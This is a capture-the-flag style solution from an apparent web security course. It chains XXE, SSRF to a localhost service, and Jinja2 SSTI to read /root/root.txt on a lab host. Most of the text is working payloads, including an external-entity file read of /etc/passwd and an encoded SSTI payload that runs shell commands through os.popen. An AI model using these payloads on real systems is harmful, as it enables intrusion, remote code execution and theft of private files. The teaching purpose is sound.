# A task summarizing an advanced web application security course
Your goal is to read the flag content from the /root/root.txt file. To do this, go to the page:
```sh
http://vuln.vms.perkmylife.com:8081/
```
and try to use the acquired knowledge from this course.

Below there is a solution:
There is a form on the page that seems to send a message to the administrator. As you’re browsing through it, you can see a comment in the source code of the main page:
```html
<!-- Hi, to send me prettier data, use XML tags <root><name>data</name></data>, oh and kill webapp on port 100 --!>
```
So we have information about the possibility of XML data transfer and the structure of this data, and about the application on port 100. Let's try to send some test data, e.g.
Let's check if any application is actually running:
```sh
http://vuln.vms.perkmylife.com:100/
```
It doesn't work, either some app is dead or it works on localhost.
```html
<root><name>Test data!</name></root>
```
It works! This means that the data is displayed from the contents of the <name> </name> tags. Now let's try to use an entity for an external file to see if we can use the entity.
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<root>
    <name>&xxe;</name>
</root>
```
It works! If we try to display the /root/root.txt file

//src/vuln/advanced_exercise_summary/exploits/xml_exploit.xml
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/root/root.txt">
]>
<root>
    <name>&xxe;</name>
</root>
```
Nothing will be displayed. It’s probably due to the fact that we are a user that is to operate the site, not a root. Normally we should elevate the permissions, but we don't have the shell yet.
We can read files, but also try to look for other servers that are not available to the public, for example, because they are on a loopback.
Keeping in mind the developer's comment about port 100, let's try to enter the applications from the localhost level.
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100">
]>
<root>
    <name>&xxe;</name>
</root>
```
It works!
Now, when we know the port, we get the message:
```html
Hi, guest Can you find flag?
```
It looks like a cookie or some URL parameter is responsible for displaying the name "guest", or it is a constant name. Let's check if the very often used name parameter will change something:
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100?name=test">
]>
<root>
    <name>&xxe;</name>
</root>
```
It works! It looks like the website may be using template engines, let's check if any of these payloads work.
```haskell
{{7*7}}
${7*7}
```
Be sure to URL encode them before sending as they can destroy XML syntax. 
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100?name=%7B%7B7%2A7%7D%7D">
]>
<root>
    <name>&xxe;</name>
</root>
```
As it turns out, {{7 * 7}} works great. Let's try to do RCE for FLASK applications because it is a very often used framework. If such an exploit did not work,
you could try to use other exploits for other template engines.

//src/vuln/advanced_exercise_summary/exploits/ssti_exploit.html
```html
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
```
From the previous part of the course, we know how to create an RCE SSTI code that displays the result of the "id" command. Now such code should be URL encoded and given as the name parameter in XXE.
```haskell
%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__%28%29%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values%28%29%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys%28%29%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D%28%27__import__%28%22os%22%29.popen%28%22id%22%29.read%28%29%27%29%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
```
And in XML:
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__%28%29%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values%28%29%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys%28%29%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D%28%27__import__%28%22os%22%29.popen%28%22id%22%29.read%28%29%27%29%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D">
]>
<root>
    <name>&xxe;</name>
</root>
```
The code works great. Additionally, it turned out that the application is running as root. Now let's try to change the command "id" to "cat /root/root.txt"
```html
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("cat /root/root.txt").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
```
Now URL encoding
```
%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__%28%29%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values%28%29%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys%28%29%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D%28%27__import__%28%22os%22%29.popen%28%22cat%20%2Froot%2Froot.txt%22%29.read%28%29%27%29%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
```
And paste the finished SSTI exploit is XXE
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__%28%29%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values%28%29%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys%28%29%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D%28%27__import__%28%22os%22%29.popen%28%22cat%20%2Froot%2Froot.txt%22%29.read%28%29%27%29%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D">
]>
<root>
    <name>&xxe;</name>
</root>
```
And it's ready! This is the end of the task. We have used three vulnerabilities here - XXE enabling SSRF and SSTI on the local server of the machine. It very often happens that attackers find several bugs that, when combined together, allow very dangerous activities.
